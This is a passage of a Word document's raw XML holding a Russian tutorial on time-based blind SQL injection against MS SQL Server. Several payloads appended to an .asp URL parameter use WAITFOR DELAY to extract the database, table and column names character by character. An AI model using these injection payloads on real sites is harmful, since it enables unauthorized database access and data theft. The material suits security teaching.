          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.  Также как и с именем пользователя можно определить все симв</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>олы в имени текущей базы данных</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. П</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ример:</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ASCII</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LOWER</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SUBSTRING</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>((DB_NAME()),i</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1)))&gt;code</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) WAITFOR </w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DELAY '00:00:10'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1F8C" w:rsidRPr="001B1F8C" w:rsidRDefault="001B1F8C" w:rsidP="001B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Поиском для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в интервале от 1 до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и подстановкой нужного кода символа мы сможем определить имя базы данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="0027327E" w:rsidRDefault="000606E8" w:rsidP="001B1F8C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B1F8C" w:rsidRDefault="00865DCA" w:rsidP="001B1F8C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>о выяснить длину имени таблицы</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, добавив условие</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> что</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> значение в колонке </w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">таблицы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> равно символу 'U'.</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Значение в колонке</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001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> показывает, кем была созда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>на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rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="001B1F8C" w:rsidRDefault="00865DCA"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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1 NAME from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xtype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>='U')&gt;</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</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 xml:space="preserve"> WAITFOR DELAY '00:00:10'-- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865DCA" w:rsidRPr="001B1F8C" w:rsidRDefault="00865DCA" w:rsidP="00865DCA">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865DCA" w:rsidP="00354B8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Далее узнаём имя этой таблицы посимвольно</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007E142F" w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Определение имён других </w:t>
      </w:r>
      <w:r w:rsidR="007E142F">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Default="007E142F" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E142F">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7E142F">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7E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'U'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00317A2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">name != </w:t>
      </w:r>
      <w:r w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>')&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WAITFOR</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97D9A">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00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> '00:00:10'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRPr="00354B8E"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354B8E" w:rsidRDefault="00354B8E" w:rsidP="00165AA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 имя уже найденной таблицы. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="00B97D9A"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354B8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>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17464E">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17464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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17464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsid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00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>')&gt;k</w:t>
      </w:r>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) WAITFOR D</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ELAY '00:00:10'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRPr="00354B8E" w:rsidRDefault="00354B8E" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRPr="00354B8E" w:rsidRDefault="00354B8E" w:rsidP="00BD26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data</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - имя найденной базы данных. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753818" w:rsidRPr="00354B8E" w:rsidRDefault="00753818" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRDefault="0017464E" w:rsidP="00BD26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354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имя</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> колон</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> таблицы </w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">найденной таблицы. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRDefault="00BD26D7" w:rsidP="00BD26D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2241"/>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7464E" w:rsidRDefault="0017464E" w:rsidP="00354B8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASCII</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LOWER</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SUBSTRING</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP </w:t>
      </w:r>
      <w:r w:rsidR="00354B8E" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354B8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354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRP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i</w:t>
      </w:r>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j</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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&gt;code</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) WAITFOR DE</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LAY '00:00:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRPr="00354B8E" w:rsidRDefault="00354B8E" w:rsidP="00354B8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="00354B8E" w:rsidRDefault="00354B8E" w:rsidP="00BD26D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Для определения имёни первой колонки мы выбираем первую колонку из всех колонок указанной таблицы -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из конкретной базы данных - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>data_base_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00753818">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таким же способом, но с добавлением условия</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> исключения уже найденной колонок </w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7" w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7" w:rsidRPr="00BD26D7">
        <w:rPr>
